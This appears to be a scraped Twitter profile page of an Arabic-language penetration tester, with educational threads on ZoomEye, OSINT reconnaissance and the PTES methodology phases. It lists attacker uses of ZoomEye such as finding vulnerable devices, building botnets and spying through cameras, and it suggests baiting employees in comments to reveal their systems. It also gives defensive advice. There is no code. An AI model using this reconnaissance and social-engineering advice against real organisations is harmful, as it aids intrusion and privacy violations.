على الرابط الرسمي التالي: https://t.co/cqHOUjQeUC ✅ أو CLI من خلال بايثون عبر الرابط التالي: https://t.co/7r0LXHwKnw ✅ الرابط التالي لتعبئة بيانات البحث بطريقة سهله: https://t.co/FBrIhTW3sJ

IT676's tweet photo. #الامن_السيبراني
#اختبار_الاختراق
🕵🏻‍♂️ Passive Reconnaissance Tools & Techniques.

ZoomEye
🔺 يسمى بمحرك بحث الهاكرز.
🔺واحيانا محرك بحث مختصي الأمن.

🔺اذا مثلا كان فيه ثغره جديدة مكتشفة وكنا حابين نعرف كم تقريبًا عدد الأجهزه المتأثره؟
🔺أو كنا حابين نحصل أجهزه مصابة بهذه الثغره ونبي نختبرها أو نجربها لكتابة بحث أمني أو تقرير؟

✅ زوم آي يعتبر أحد الأدوات المناسبة لهذه الأغراض.

🔺 لنتعرف أكثر على ZoomEye

📌 ماهو ZoomEye؟

🔺هو محرك بحث صيني تم تطويره من شركة KnownSec مصمم لاكتشاف ورسم خرائط وتحليل الأجهزة المتصلة بالإنترنت وخدمات الويب والبرمجيات واصداراتها.

🔺مشابه لمحركات البحث الأخرى مثل Shodan أو Censys، حيث يقوم ZoomEye بفهرسة المعلومات المتعلقة بالأجهزة المتصلة بالإنترنت، بما في ذلك خوادم الويب Web servers وأجهزة التوجيه routers وكاميرات الويب web cams وأجهزة IoT (إنترنت الأشياء) الأخرى.

🔺يقوم ZoomEye بجمع البيانات حول العديد من الخدمات ومعلومات الموقع الجغرافي وإصدارات البرامج وغيرها، مما يساعد المستخدمين على فهم ما هو متصل بالإنترنت ومما يتكون.

📌 لماذا زوم آي؟
Why?

🔺الغرض من ZoomEye والمحركات المشابهه هو تزويد الباحثين الأمنيين ومتخصصي الأمن السيبراني بأداة لمراقبة وتأمين شبكاتهم الخاصة، بالإضافة إلى إجراء أبحاث حول نقاط الضعف. فهو يسمح للمستخدمين برؤية شبكتهم كما يفعل الهاكر، وتحديد نقاط الضعف الأمنية المحتملة قبل أن يتم استغلالها في الهجمات السيبرانية

Passive Reconnaissance
🔺الاستطلاع : يمكن للهاكرز ومختبري الاختراق استخدام ZoomEye لجمع معلومات حول الأهداف المحتملة، والعثور على الأجهزة أو الأنظمة التي قد تكون عرضة للهجوم بسبب البرامج القديمة، أو الاعدادات الخاطئة، أو نقاط الضعف المعروفة.

✅ أشهر بعض استخدامات الهاكرز لزوم آي:

🔺1. تحديد الأهداف والاستطلاع:
يمكن للهاكرز استخدام ZoomEye لتحديد الأهداف المحتملة عن طريق البحث عن الأجهزة المتصلة بالإنترنت ولكنها غير آمنة أو تمت تهيئتها بشكل خاطئ. يمكن أن يشمل ذلك الأجهزة ذات المنافذ المفتوحة التي لا ينبغي كشفها، أو الأنظمة التي تشغل برامج قديمة معرضة للاستغلال، أو الأجهزة التي تستخدم بيانات افتراضية أو ضعيفة. ومن خلال تحديد هذه الأهداف، يمكن للهاكرز التخطيط لهجمات أكثر فعالية.

🔺2. استغلال الثغرات الأمنية المعروفة:
بمجرد تحديد الأهداف المحتملة، يمكن للهاكرز استخدام المعلومات التي تم جمعها من ZoomEye لاستغلال نقاط الضعف المعروفة. على سبيل المثال، إذا كشف ZoomEye أن عنوان IP معين يقوم بتشغيل إصدار من خادم ويب web server معروف بأنه معرض للخطر، فيمكن للمتسلل استخدام هذه المعلومات لتنفيذ هجوم مصمم خصيصًا لتلك الثغرة الأمنية المحددة.

"يعتبر من أشهر الاستخدامات التي يقوم بها الهاكرز العشوائيون لتنفيذ هجمات عشوائية حول منظمات "أو أفراد" عشوائية "

🔺3. بناء شبكات الروبوت Botnets:
يمكن للهاكرز استخدام ZoomEye لاكتشاف أجهزة إنترنت الأشياء المعرضة للخطر، مثل الكاميرات الأمنية أو أجهزة الراوترز أو الأجهزة الذكية، والتي يمكن إصابتها وضمها إلى شبكة الروبوتات. يمكن بعد ذلك استخدام شبكات الروبوت هذه لأغراض ضارة مختلفة، بما في ذلك هجمات DDoS أو حملات البريد العشوائي وغيرها

🔺4. تجاوز الإجراءات الأمنية:
قد يستخدم الهاكرز ZoomEye للعثور على مسارات غير مباشرة إلى الشبكة المستهدفة. على سبيل المثال، من خلال تحديد الأجهزة الأقل أمانًا والمتصلة بشبكات أكثر أمانًا، يمكن للهاكرز استغلال هذه الروابط الضعيفة لتجاوز الإجراءات الأمنية والحصول على وصول أعمق إلى الشبكة.

🔺5. جمع البيانات:
من خلال تحديد قواعد البيانات أو أجهزة التخزين المكشوفة والوصول إليها من خلال ZoomEye، يمكن للهاكرز استخراج المعلومات الحساسة، والتي يمكن استخدامها لسرقة الهوية أو الاحتيال المالي أو التجسس على الشركات.

🔺6. المراقبة والتنصت:
يمكن للهاكرز استخدام ZoomEye للتعرف على الكاميرات أو الميكروفونات أو الأجهزة الأخرى غير الآمنة والوصول إليها والتي يمكن استخدامها للتجسس على الأفراد أو المنظمات، أو جمع معلومات سرية أو شخصية دون موافقة.

✅ الاجراءات الدفاعية:
ينبغي على المنظمات والأفراد:

🔺1. تدقيق ومراقبة الأجهزه والشبكات والمواقع التي تواجه الإنترنت بانتظام باستخدام أدوات مثل ZoomEye.

🔺2. تطبيق التصحيحات والتحديثات في الوقت المناسب على البرامج والأجهزة.

🔺3. تغيير كلمات المرور الافتراضية واستخدم حسابات دخول قوية وفريدة من نوعها.

🔺4. تنفيذ مبادئ تقسيم الشبكة وأقل الامتيازات لتقليل الأضرار المحتملة.

🔺5. تثقيف الموظفين حول مخاطر وعلامات التهديدات السيبرانية.

✅ يتوفر زوم آي كخدمة من خلال المتصفح على الرابط الرسمي التالي:
https://t.co/cqHOUjQeUC

✅ أو CLI من خلال بايثون عبر الرابط التالي:
https://t.co/7r0LXHwKnw

✅ الرابط التالي لتعبئة بيانات البحث بطريقة سهله:
https://t.co/FBrIhTW3sJ

IT676 retweeted

سلمان بن عبدالعزيز

@KingSalman

about 2 years ago

نحمد الله سبحانه أن بلّغنا شهر رمضان المبارك، شهر الخير والبركات، سائلين المولى أن يوفقنا لصيامه وقيامه. داعين الله أن يديم على وطننا وأمتنا الإسلامية والعالم أجمع الخير والسلام. تقبل الله منا ومنكم صالح الأعمال، وكل عام وأنتم بخير.

19K

146K

102K

38M

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

#الامن_السيبراني #اختبار_الاختراق 📝 في هذا الثريد سنتعرف عن قرب على مرحلة جمع المعلومات و الأدوات و الأساليب المستخدمة. ✅🕵🏻‍♂️مرحلة جمع المعلومات : Intelligence Gathering Phase: 🔺تعتبر الخطوة الفنية الأولى والأهم ونقطة البداية في عملية اختبار الاختراق. 🔺الهدف الأساسي هو جمع البيانات الكافية للتخطيط والتنفيذ الفعال لاختبار اختراق ناجح أو هجوم سيبراني. 🔺تهدف أيضًا إلى معرفة أكبر قدر ممكن عن العميل أو الهدف. 🔺تعتمد المعلومات التي تجمعها في هذه المرحلة على الهدف. -إذا كان الهدف موقعًا إلكترونيًا، فأنت تريد معرفة أكبر قدر ممكن من التقنيات الموجودة خلف موقع الويب. -إذا كان الهدف شخصًا، فأنت تريد أن تعرف أكبر قدر ممكن عن هذا الشخص. وهكذا 🕵🏻‍♂️🔺القاعدة الأساسية في جمع المعلومات: كلما عرفت المزيد عن الهدف، زادت فرص نجاحك في الاختراق. 🔺خلال هذه المرحلة، أنت تقوم بتحليل مصادر المعلومات العامة والمتاحة مجانًا، وهي عملية تُعرف باسم جمع المعلومات الاستخبارية مفتوحة المصدر (OSINT)Open Source Intelligence 🔺هذه المرحلة تتضمن جمع وتحليل المعلومات من (المصادر المتاحة للجميع "العامة") لتحديد نقاط الضعف المحتملة أو الثغرات الأمنية أو التهديدات في النظام أو الشبكة أو المؤسسة المستهدفة. 🕵🏻‍♂️🔺يعتمد نجاح اختبار الاختراق في أغلب الأحيان على نتائج مرحلة جمع المعلومات. ✅ Open Source Intelligence (OSINT): 🔺 يشير OSINT إلى أي معلومات غير سرية و متاحة مجانًا ويمكن للعامة الوصول إليها بشكل قانوني. 🔺يتضمن جمع البيانات من مصادر متاحة للعامة لاستخدامها في سياق استخباراتي وجمع معلوماتي. 🔺يشير الاستطلاع Reconnaissance إلى المرحلة الأولية حيث يقوم المهاجم (أو مختبر الاختراق) بجمع معلومات حول النظام أو الشبكة أو المؤسسة المستهدفة قبل شن الهجوم. 🕵🏻‍♂️🔺في بعض الحالات، قد يستغرق الاستطلاع ما يصل إلى 90% من وقت عملية اختبار الاختراق بأكملها. ✅ يمكن تصنيف الاستطلاع إلى نوعين رئيسيين: 1. الاستطلاع المجهول Passive Reconnaissance 2. الاستطلاع المعلوم.Active Reconnaissance ✅ Passive Reconnaissance 🔺في الاستطلاع المجهول، يقوم المهاجم أو المختبر بجمع المعلومات ((دون التفاعل المباشر مع النظام المستهدف)) لكي لا يقوم بتنبيه الهدف أو النظم الأمنية المخصصة لكشف محاولات الاختراق أو جمع المعلومات. 🔺تقلل هذه الطريقة من مخاطر الاكتشاف، لأنه يتضمن عادةً جمع المعلومات المتاحة لعامة الناس. 🔺تشمل الأساليب جمع البيانات من مواقع الويب العامة ومنصات التواصل الاجتماعي وقواعد البيانات المسربة و غيرها من المصادر المفتوحة (OSINT). 🔺غالبًا ما يطلق على هذه التقنيات اسم "الاستطلاع المجهول أو السلبي" لأن الهاكر يجمع المعلومات دون التفاعل مع الهدف. 🔺نستطيع جمع الكثير من المعلومات المفيده من المصادر العامة كما سنرى لاحقًا ✅ من الأمثلة على جمع المعلومات من وسائل التواصل الاجتماعي : 🚨 هل مدير شركة معينة يغرد كثيرًا على تويتر ويتفاخر بالأنظمة التي تستخدمها شركته؟ نستطيع الاستفاده من نوع البرمجيات المستخدمة وبالتالي اختصار الكثير من عمليات الفحص لتحديد نوع النظم المستخدمه لاحقًا. 🚨هل مدير الشركة قام بالتحدث عن معلومات الاجتماع مع شركة تقوم بتطوير برمجيات معروفة؟ قد نستطيع معرفة النظم التي سيقومون باستخدامها. 🚨هل مدير شركة معينة أو موظفيها يقومون بمشاركة فيديوهات وهم في مكاتبهم يعملون وتظهر النظم المستخدمة؟ دعنا نختلق نقاشًا في التعليقات نستقنص فيه نظام معين ونقوم باستخراج معلومات أكثر من الموظفين. ❗️ قد تبدو لك هذه الأمور طبيعية ولكن في الواقع تعتبر معلومات متاحة للعامة يمكن استغلالها بشكل مناسب عند الرغبة في الاختراق. 📌 باختصار وبشكل عام: يساعد OSINT في فهم بيئة الهدف، بما في ذلك البنية التحتية للشبكة، والبرمجيات، وتفاصيل الموظفين، و اعدادات النظام، والتي تعتبر ضرورية للتخطيط لاختبار اختراق فعال وناجح.

IT676's tweet photo. #الامن_السيبراني
#اختبار_الاختراق

📝 في هذا الثريد سنتعرف عن قرب على مرحلة جمع المعلومات و الأدوات و الأساليب المستخدمة.

✅🕵🏻‍♂️مرحلة جمع المعلومات :
Intelligence Gathering Phase:

🔺تعتبر الخطوة الفنية الأولى والأهم ونقطة البداية في عملية اختبار الاختراق.

🔺الهدف الأساسي هو جمع البيانات الكافية للتخطيط والتنفيذ الفعال لاختبار اختراق ناجح أو هجوم سيبراني.

🔺تهدف أيضًا إلى معرفة أكبر قدر ممكن عن العميل أو الهدف.

🔺تعتمد المعلومات التي تجمعها في هذه المرحلة على الهدف.
-إذا كان الهدف موقعًا إلكترونيًا، فأنت تريد معرفة أكبر قدر ممكن من التقنيات الموجودة خلف موقع الويب.
-إذا كان الهدف شخصًا، فأنت تريد أن تعرف أكبر قدر ممكن عن هذا الشخص.
وهكذا

🕵🏻‍♂️🔺القاعدة الأساسية في جمع المعلومات: كلما عرفت المزيد عن الهدف، زادت فرص نجاحك في الاختراق.

🔺خلال هذه المرحلة، أنت تقوم بتحليل مصادر المعلومات العامة والمتاحة مجانًا، وهي عملية تُعرف باسم جمع المعلومات الاستخبارية مفتوحة المصدر (OSINT)Open Source Intelligence

🔺هذه المرحلة تتضمن جمع وتحليل المعلومات من (المصادر المتاحة للجميع "العامة") لتحديد نقاط الضعف المحتملة أو الثغرات الأمنية أو التهديدات في النظام أو الشبكة أو المؤسسة المستهدفة.

🕵🏻‍♂️🔺يعتمد نجاح اختبار الاختراق في أغلب الأحيان على نتائج مرحلة جمع المعلومات.

✅ Open Source Intelligence (OSINT):
🔺 يشير OSINT إلى أي معلومات غير سرية و متاحة مجانًا ويمكن للعامة الوصول إليها بشكل قانوني.

🔺يتضمن جمع البيانات من مصادر متاحة للعامة لاستخدامها في سياق استخباراتي وجمع معلوماتي.

🔺يشير الاستطلاع Reconnaissance إلى المرحلة الأولية حيث يقوم المهاجم (أو مختبر الاختراق) بجمع معلومات حول النظام أو الشبكة أو المؤسسة المستهدفة قبل شن الهجوم.

🕵🏻‍♂️🔺في بعض الحالات، قد يستغرق الاستطلاع ما يصل إلى 90% من وقت عملية اختبار الاختراق بأكملها.

✅ يمكن تصنيف الاستطلاع إلى نوعين رئيسيين:
1. الاستطلاع المجهول Passive Reconnaissance
2. الاستطلاع المعلوم.Active Reconnaissance

✅ Passive Reconnaissance
🔺في الاستطلاع المجهول، يقوم المهاجم أو المختبر بجمع المعلومات ((دون التفاعل المباشر مع النظام المستهدف)) لكي لا يقوم بتنبيه الهدف أو النظم الأمنية المخصصة لكشف محاولات الاختراق أو جمع المعلومات.

🔺تقلل هذه الطريقة من مخاطر الاكتشاف، لأنه يتضمن عادةً جمع المعلومات المتاحة لعامة الناس.

🔺تشمل الأساليب جمع البيانات من مواقع الويب العامة ومنصات التواصل الاجتماعي وقواعد البيانات المسربة و غيرها من المصادر المفتوحة (OSINT).

🔺غالبًا ما يطلق على هذه التقنيات اسم "الاستطلاع المجهول أو السلبي" لأن الهاكر يجمع المعلومات دون التفاعل مع الهدف.

🔺نستطيع جمع الكثير من المعلومات المفيده من المصادر العامة كما سنرى لاحقًا

✅ من الأمثلة على جمع المعلومات من وسائل التواصل الاجتماعي :

🚨 هل مدير شركة معينة يغرد كثيرًا على تويتر ويتفاخر بالأنظمة التي تستخدمها شركته؟
نستطيع الاستفاده من نوع البرمجيات المستخدمة وبالتالي اختصار الكثير من عمليات الفحص لتحديد نوع النظم المستخدمه لاحقًا.

🚨هل مدير الشركة قام بالتحدث عن معلومات الاجتماع مع شركة تقوم بتطوير برمجيات معروفة؟
قد نستطيع معرفة النظم التي سيقومون باستخدامها.

🚨هل مدير شركة معينة أو موظفيها يقومون بمشاركة فيديوهات وهم في مكاتبهم يعملون وتظهر النظم المستخدمة؟
دعنا نختلق نقاشًا في التعليقات نستقنص فيه نظام معين ونقوم باستخراج معلومات أكثر من الموظفين.

❗️ قد تبدو لك هذه الأمور طبيعية ولكن في الواقع تعتبر معلومات متاحة للعامة يمكن استغلالها بشكل مناسب عند الرغبة في الاختراق.

📌 باختصار وبشكل عام: يساعد OSINT في فهم بيئة الهدف، بما في ذلك البنية التحتية للشبكة، والبرمجيات، وتفاصيل الموظفين، و اعدادات النظام، والتي تعتبر ضرورية للتخطيط لاختبار اختراق فعال وناجح.

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

📝 أشهر منهجيات #اختبار_الاختراق الشائعة و المستخدمة. 🔺 يوجد الكثير من المنهجيات Methodologies المستخدمة لاختبار الاختراق، و تختلف هذه المنهجيات بالأهداف التي تم تخصيصها لأجلها وبمجال اختبار الاختراق وما يتضمنه،،ولكن جميعها تهدف إلى اكتشاف نقاط الضعف الأمنية و ضمان معالجتها و ضمان خلو هذه الجهة من الثغرات الأمنية. 🔺قد تكون أحد هذه المنهجيات مناسبة وملائمة أكثر من غيرها، وذلك يعتمد بالكامل على احتياجات وبيئة المنظمة المراد اختبارها. 🔺من المهم لمحترفي الأمن السيبراني أن يكونوا على دراية بهذه المنهجيات و أن يفهموا كيف يتم تطبيقها في حالات مختلفة. 📌 أشهر خمسة منهجيات شائعة و مستخدمة. 1. Open Source Security Testing Methodology Manual (OSSTMM) 2. Penetration Testing Execution Standard (PTES) 3. Information Systems Security Assessment Framework (ISSAF) 4. NIST Special Publication 800-115 5. OWASP Testing Guide 🔺بالإمكان البحث عن هذه المنهجيات لمعلومات أكثر، هنا سنقوم بمناقشة النهج رقم 2 🔺بعد أن نقوم بالتعرف علي PTEST و مراحل اختبار الاختراق و أهداف و أنشطة كل مرحلة سنقوم لاحقًا بتطبيق عملي لهذه الخطوات وبشكل واقعي. ✅ Penetration Testing Execution Standard (PTES) 🔺هو عبارة عن إطار اختبار مصمم ليكون بمثابة معيار لإجراء اختبار الاختراق. تم تطويره من قبل مجموعة من خبراء الأمن لتوفير منهجية قابلة للتكرار ومتسقة لاختبار الاختراق. 🔺 يعد هذا الإطار معروفًا بشكل جيد ومصممًا لتوفير ارشادات واضحة لاجرات اختبارات الاختراق. 🔺 يقسم PTEST إلى سبعة أقسام " مراحل" أساسية تغطي جميع جوانب اختبار الاختراق. PTES Sessions/ Phases 🔺 يوجد لكل مرحلة أهداف محددة تتم من خلال اجراءات و أنشطة معينة ، هذه السبع مراحل كالآتي: ✅ 1. تفاعل ما قبل الاشتباك Pre-engagement Interactions: 📌تهدف هذه المرحلة إلى تحديد قواعد الاختبار ومجاله. 🔺الهدف: إنشاء اتفاق وتفاهم و اتصال واضح بين فريق اختبار الاختراق والعميل. 🔺الأنشطة الرئيسية: تحديد نطاق وقواعد الاختبار وأهدافه وآثاره ، كذلك الحصول على الوثائق والأذونات القانونية اللازمة. 🔺الأهمية: التأكد من أن كلا الطرفين لديهم فهم متبادل لحدود الاختبار. يوجد العديد من الأسئلة التي تتم في هذه المرحلة للحصول على تفاهم تام حول الاختبار ،، تتنوع هذه الأسئلة بين أسئلة فنية، و قانونية وغيرها. ✅ 2. جمع المعلومات Intelligence Gathering: 📌 هذه المرحلة تشبه جمع المعلومات الاستخبارية قبل تنفيذ مهمة في العالم الحقيقي. 🔺الهدف: جمع أكبر قدر ممكن من المعلومات حول المنظمة المستهدفة وأنظمتها. 🔺الأنشطة الرئيسية: البحث عن معلومات المنظمة المستهدفة، استكشاف شبكاتها، وجمع المعلومات حول البنية التحتية والتقنيات المستخدمة والموظفين المستهدفين. 🔺الأهمية: يساعد في تحديد نقاط الضعف المحتملة والتخطيط لطرق و أساليب الهجوم. 🚨 تشكل هذه المرحلة 90٪ و أكثر من عملية الاختبار ومن اختصار ونجاح وموثوقية وكفاءة اختبار الاختراق…كذلك عند الفشل في ملاحظة أو تحديد معلومة هامة معينة قد يؤدي ذلك إلى فشل اختبار الاختراق وتمكن المهاجمين من استغلال هذا الشيء رغم تنفيذ اختبار الاختراق. 🚨 تعد هذه المرحلة هي الأساس لكافة المراحل القادمة،،الفشل في هذه المرحلة أو التقصير قد يؤدي إلى فشل تام للاختبار. ✅ 3. نمذجة التهديدات والمخاطر Thread Modeling : 📌في هذه المرحلة يتم إنشاء نماذج تصف كيف يمكن للمهاجمين اختراق النظام وإحداث الضرر. 🔺الهدف: تحديد وترتيب أولويات التهديدات المحتملة للهدف. 🔺الأنشطة الرئيسية: تحليل المعلومات التي تم جمعها لتحديد نقاط الضعف والتهديدات الخاصة بالمنظمة. 🔺الأهمية: تمكن فريق الاختبار من تركيز جهودهم على طرق الهجوم الواقعية وذات الصلة، مما يحسن كفاءة الاختبار وأهميته. ✅4. تحليل نقاط الضعف والثغرات Vulnerability Analysis: 📌 في هذه المرحلة يتم اكتشاف وتحليل نقاط الضعف التقنية مثل نقاط الضعف في نظام التشغيل والشبكة والتطبيقات بالإضافة إلى تقييم خطورة نقاط الضعف هذه "Critical , High, Low etc.. ". 🔺الهدف: اكتشاف نقاط الضعف داخل النظام. 🔺الأنشطة الرئيسية: استخدام الأدوات والتقنيات اليدوية لتحديد نقاط الضعف في النظام. 🔺الأهمية: توفير قائمة شاملة بنقاط الضعف التي يمكن استغلالها من قبل المهاجمين، وتعتبر بمثابة الأساس للمرحلة التالية. ✅5. استغلال الثغرات Exploitation: 📌تهدف هذه المرحلة إلى محاولة الوصول الغير مصرح به إلى الأنظمة من خلال تقنيات وطرق الاختراق مثل اختراق كلمة المرور والهندسة الاجتماعية وتجاوز جدران الحماية وغيرها.. 🔺الهدف: استغلال نقاط الضعف المحددة بأمان لتحديد ومعرفة تأثيرها. 🔺الأنشطة الرئيسية: محاولة اختراق الأنظمة وقيودها الأمنية والحصول على وصول غير مصرح به باستخدام نقاط الضعف المحددة. 🔺الأهمية: يوضح التأثير الواقعي لنقاط الضعف، ويقدم دليلاً ملموسًا على نقاط ضعف النظام. ✅ 6. مابعد الاستغلال Post Exploitation: 📌 تهدف هذه المرحلة إلى استخراج البيانات من الأنظمة المخترقة، والحفاظ على الوصول، وتغطية ومسح الآثار، والانتقال إلى أنظمة أخرى. 🔺الهدف: تحديد قيمة النظام المخترق والحفاظ على التحكم والوصول لهذا النظام لاستخدامه لاحقًا. 🔺الأنشطة الرئيسية: تحديد ما يمكن فعله بالنظام المخترق، وتحديد إمكانيات استخراج البيانات، وفهم مستوى الوصول الذي تم الحصول عليه. 🔺الأهمية: توفير نظرة مفصلة للأضرار المحتملة وفقدان البيانات التي قد تحدث في هجوم حقيقي. ✅ 7. التوثيق وكتابة التقارير Reporting : 📌 توثيق الاكتشافات ونقاط الضعف والأنظمة المستغلة وتحليل النتائج وتقديم حلول واستراتيجيات موصى بها لمنع نقاط الضعف هذه واستغلالها من قبل المهاجمين. 🔺الهدف: توثيق النتائج والتوصيات الأمنية. 🔺الأنشطة الرئيسية: إعداد تقرير شامل يوضح بالتفصيل نقاط الضعف ونتائج الاستغلال وخطوات المعالجة. 🔺الأهمية: تقدم للعميل معلومات قابلة للتنفيذ لتحسين وضعه الأمني، وإصلاح نقاط الضعف المحددة، ومنع الانتهاكات المستقبلية. 📝 في التغريدة القادمة سنرى مثال شامل لهذه الخطوات

IT676's tweet photo. 📝 أشهر منهجيات #اختبار_الاختراق الشائعة و المستخدمة.
🔺 يوجد الكثير من المنهجيات Methodologies المستخدمة لاختبار الاختراق، و تختلف هذه المنهجيات بالأهداف التي تم تخصيصها لأجلها وبمجال اختبار الاختراق وما يتضمنه،،ولكن جميعها تهدف إلى اكتشاف نقاط الضعف الأمنية و ضمان معالجتها و ضمان خلو هذه الجهة من الثغرات الأمنية.

🔺قد تكون أحد هذه المنهجيات مناسبة وملائمة أكثر من غيرها، وذلك يعتمد بالكامل على احتياجات وبيئة المنظمة المراد اختبارها.

🔺من المهم لمحترفي الأمن السيبراني أن يكونوا على دراية بهذه المنهجيات و أن يفهموا كيف يتم تطبيقها في حالات مختلفة.

📌 أشهر خمسة منهجيات شائعة و مستخدمة.
1. Open Source Security Testing Methodology Manual (OSSTMM)
2. Penetration Testing Execution Standard (PTES)
3. Information Systems Security Assessment Framework (ISSAF)
4. NIST Special Publication 800-115
5. OWASP Testing Guide

🔺بالإمكان البحث عن هذه المنهجيات لمعلومات أكثر،
هنا سنقوم بمناقشة النهج رقم 2

🔺بعد أن نقوم بالتعرف علي PTEST و مراحل اختبار الاختراق و أهداف و أنشطة كل مرحلة سنقوم لاحقًا بتطبيق عملي لهذه الخطوات وبشكل واقعي.

✅ Penetration Testing Execution Standard (PTES)

🔺هو عبارة عن إطار اختبار مصمم ليكون بمثابة معيار لإجراء اختبار الاختراق. تم تطويره من قبل مجموعة من خبراء الأمن لتوفير منهجية قابلة للتكرار ومتسقة لاختبار الاختراق.

🔺 يعد هذا الإطار معروفًا بشكل جيد ومصممًا لتوفير ارشادات واضحة لاجرات اختبارات الاختراق.

🔺 يقسم PTEST إلى سبعة أقسام " مراحل" أساسية تغطي جميع جوانب اختبار الاختراق.
PTES Sessions/ Phases

🔺 يوجد لكل مرحلة أهداف محددة تتم من خلال اجراءات و أنشطة معينة ، هذه السبع مراحل كالآتي:

✅ 1. تفاعل ما قبل الاشتباك Pre-engagement Interactions:
📌تهدف هذه المرحلة إلى تحديد قواعد الاختبار ومجاله.

🔺الهدف: إنشاء اتفاق وتفاهم و اتصال واضح بين فريق اختبار الاختراق والعميل.

🔺الأنشطة الرئيسية: تحديد نطاق وقواعد الاختبار وأهدافه وآثاره ، كذلك الحصول على الوثائق والأذونات القانونية اللازمة.

🔺الأهمية: التأكد من أن كلا الطرفين لديهم فهم متبادل لحدود الاختبار.
يوجد العديد من الأسئلة التي تتم في هذه المرحلة للحصول على تفاهم تام حول الاختبار ،، تتنوع هذه الأسئلة بين أسئلة فنية، و قانونية وغيرها.

✅ 2. جمع المعلومات Intelligence Gathering:
📌 هذه المرحلة تشبه جمع المعلومات الاستخبارية قبل تنفيذ مهمة في العالم الحقيقي.

🔺الهدف: جمع أكبر قدر ممكن من المعلومات حول المنظمة المستهدفة وأنظمتها.

🔺الأنشطة الرئيسية: البحث عن معلومات المنظمة المستهدفة، استكشاف شبكاتها، وجمع المعلومات حول البنية التحتية والتقنيات المستخدمة والموظفين المستهدفين.

🔺الأهمية: يساعد في تحديد نقاط الضعف المحتملة والتخطيط لطرق و أساليب الهجوم.

🚨 تشكل هذه المرحلة 90٪ و أكثر من عملية الاختبار ومن اختصار ونجاح وموثوقية وكفاءة اختبار الاختراق…كذلك عند الفشل في ملاحظة أو تحديد معلومة هامة معينة قد يؤدي ذلك إلى فشل اختبار الاختراق وتمكن المهاجمين من استغلال هذا الشيء رغم تنفيذ اختبار الاختراق.

🚨 تعد هذه المرحلة هي الأساس لكافة المراحل القادمة،،الفشل في هذه المرحلة أو التقصير قد يؤدي إلى فشل تام للاختبار.

✅ 3. نمذجة التهديدات والمخاطر Thread Modeling :
📌في هذه المرحلة يتم إنشاء نماذج تصف كيف يمكن للمهاجمين اختراق النظام وإحداث الضرر.

🔺الهدف: تحديد وترتيب أولويات التهديدات المحتملة للهدف.

🔺الأنشطة الرئيسية: تحليل المعلومات التي تم جمعها لتحديد نقاط الضعف والتهديدات الخاصة بالمنظمة.

🔺الأهمية: تمكن فريق الاختبار من تركيز جهودهم على طرق الهجوم الواقعية وذات الصلة، مما يحسن كفاءة الاختبار وأهميته.

✅4. تحليل نقاط الضعف والثغرات Vulnerability Analysis:
📌 في هذه المرحلة يتم اكتشاف وتحليل نقاط الضعف التقنية مثل نقاط الضعف في نظام التشغيل والشبكة والتطبيقات بالإضافة إلى تقييم خطورة نقاط الضعف هذه "Critical , High, Low etc.. ".

🔺الهدف: اكتشاف نقاط الضعف داخل النظام.

🔺الأنشطة الرئيسية: استخدام الأدوات والتقنيات اليدوية لتحديد نقاط الضعف في النظام.

🔺الأهمية: توفير قائمة شاملة بنقاط الضعف التي يمكن استغلالها من قبل المهاجمين، وتعتبر بمثابة الأساس للمرحلة التالية.

✅5. استغلال الثغرات Exploitation:
📌تهدف هذه المرحلة إلى محاولة الوصول الغير مصرح به إلى الأنظمة من خلال تقنيات وطرق الاختراق مثل اختراق كلمة المرور والهندسة الاجتماعية وتجاوز جدران الحماية وغيرها..

🔺الهدف: استغلال نقاط الضعف المحددة بأمان لتحديد ومعرفة تأثيرها.

🔺الأنشطة الرئيسية: محاولة اختراق الأنظمة وقيودها الأمنية والحصول على وصول غير مصرح به باستخدام نقاط الضعف المحددة.

🔺الأهمية: يوضح التأثير الواقعي لنقاط الضعف، ويقدم دليلاً ملموسًا على نقاط ضعف النظام.

✅ 6. مابعد الاستغلال Post Exploitation:
📌 تهدف هذه المرحلة إلى استخراج البيانات من الأنظمة المخترقة، والحفاظ على الوصول، وتغطية ومسح الآثار، والانتقال إلى أنظمة أخرى.

🔺الهدف: تحديد قيمة النظام المخترق والحفاظ على التحكم والوصول لهذا النظام لاستخدامه لاحقًا.

🔺الأنشطة الرئيسية: تحديد ما يمكن فعله بالنظام المخترق، وتحديد إمكانيات استخراج البيانات، وفهم مستوى الوصول الذي تم الحصول عليه.

🔺الأهمية: توفير نظرة مفصلة للأضرار المحتملة وفقدان البيانات التي قد تحدث في هجوم حقيقي.

✅ 7. التوثيق وكتابة التقارير Reporting :
📌 توثيق الاكتشافات ونقاط الضعف والأنظمة المستغلة وتحليل النتائج وتقديم حلول واستراتيجيات موصى بها لمنع نقاط الضعف هذه واستغلالها من قبل المهاجمين.

🔺الهدف: توثيق النتائج والتوصيات الأمنية.

🔺الأنشطة الرئيسية: إعداد تقرير شامل يوضح بالتفصيل نقاط الضعف ونتائج الاستغلال وخطوات المعالجة.

🔺الأهمية: تقدم للعميل معلومات قابلة للتنفيذ لتحسين وضعه الأمني، وإصلاح نقاط الضعف المحددة، ومنع الانتهاكات المستقبلية.

📝 في التغريدة القادمة سنرى مثال شامل لهذه الخطوات

ENG.NAIF ALSHEHRI 🇸🇦

@IT676

over 2 years ago

#الأمن_السيبراني #اختبار_الاختراق 📝 في هذا الثريد سنتكلم بشكل أكاديمي عن منهجيات "طرق" اختبار الاختراق وأشهرها. 📌 بدايةً، ما هو اختبار الاختراق؟ What's Penetration Testing ? - هو عملية ممارسة اختبار لشبكة معينة أو نظام معين أو تطبيق معين بهدف ايجاد نقاط الضعف الأمنية التي يمكن للمهاجمين استغلالها والاضرار بهذه الشبكات، النظم أو التطبيقات. - اختبار الاختراق يمكن أن يتم بشكل يدوي أو باستخدام أدوات تلقائية. -اختبار الاختراق يمكن أن يتم من داخليًا " من داخل المؤسسة المراد اختبارها" حيث يمكن اعطاء بعض الصلاحيات والوصول للمختبرين ، ويمكن أن يتم بالكامل خارجيًا "من خارج المؤسسة " دون إعطاء أي صلاحيات و وصول للمختبرين، بحيث يتم محاكاة واقعية لهجمات خارجية يقوم بتنفيذها الهاكرز من الخارج. - اختبار الاختراق يتبع طريقة محددة وممنهجة. Penetration Testing Methodology ✅ ماهي منهجيات اختبار الاختراق؟ Penetration Testing Methodologies 🔺 هي عبارة عن مصطلح يشير إلى طريقة ونهج منظم يتبع مراحل محددة يستخدم بين متخصصي الأمن السيبراني لتحديد وتقييم واستغلال نقاط الضعف داخل شبكة معينة، أو نظام معين ، أو تطبيق معين 